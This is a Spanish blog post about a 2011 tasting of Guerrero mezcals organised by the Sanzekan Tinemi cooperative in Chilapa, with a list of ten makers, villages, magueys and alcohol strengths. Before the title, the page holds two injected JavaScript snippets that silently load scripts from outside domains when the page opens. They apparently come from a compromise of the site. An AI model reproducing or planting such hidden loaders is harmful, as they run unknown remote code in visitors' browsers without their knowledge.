;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 86. Mezcal de Guerrero: mezcal Sanzekan

86. Mezcal de Guerrero: mezcal Sanzekan


El 23 y 24 de julio asistí, en Chilapa, Guerrero, a la “Cata de mezcales Sanzekan. Cierre de temporada, cosecha 2011”, que organizó la SSS Sanzekan Tinemi para autoevaluar los mezcales producidos por sus maestros mezcaleros; evento de extraordinaria relevancia para los mezcales tradicionales (MT), ya que, como debe ser, fueron los propios maestros mezcaleros quienes evaluaron sus mezcales.
La cata fue simple: se saborearon cinco mezcales por día; cada mezcal se venenció frente a todos y se evaluó su perleado, aromas y sabores; para registrar las impresiones de cada degustador, se utilizó una ficha de cata elaborada especialmente para el evento.
A continuación, enlistaré los mezcales catados y proporcionaré: a) nombre del maestro mezcalero; b) población y municipio donde vive; c) maguey empleado; d) hornada y mes de elaboración, y e) riqueza alcohólica (% alc. vol.).
1. Refugio Calzada; Tetitlán de la Lima, Chilapa; Papalote silvestre; hornada 5, mayo 2011; 50.7.
2. Moisés Calzada; Tetitlán de la Lima, Chilapa; Papalote silvestre; hornada 3, abril 2011; 47.4.
3. Tomás Gutiérrez; Tepehuixco, Chilapa; Papalote silvestre; hornada 6, mayo 2011; 50.6.
4. Lorenzo González; Lodo Grande, Chilapa; Papalote silvestre; hornada 6, mayo 2011; 50.3.
5. Eloy Hernández; Ahuihuiyuco, Chilapa; Papalote silvestre; hornada 6, mayo 2011; 50.6.
6. Ciro Barranca; Santa Cruz, Chilapa; Papalote silvestre; hornada 4, mayo 2011; 46.8.
7. Silvestre González; Topiltepec, Zitlala; Papalote silvestre; hornada 4, abril 2011; 49.9.
8. Benigno Sánchez; El Peral, Chilapa; Papalote silvestre; hornada 2, abril 2011; 48.
9. Adrián de Jesús Saldaña; Chilacachapa, Tixtla; Papalote silvestre; hornada 6, mayo 2011; 52.
10. Lucino Casarrubias; Xocoyolzintla, Ahuacotzingo; Papalote y Zacatoro, ambos silvestres; hornada 1, abril 2011; 52.2.
Quien desee saborear MT de Durango de tres magueyes diferentes, acuda el martes 2 de agosto a las 20 horas a Red Fly: Orizaba 145, colonia Roma, DF. Serán de maguey Cenizo, Verde y Tepemete.

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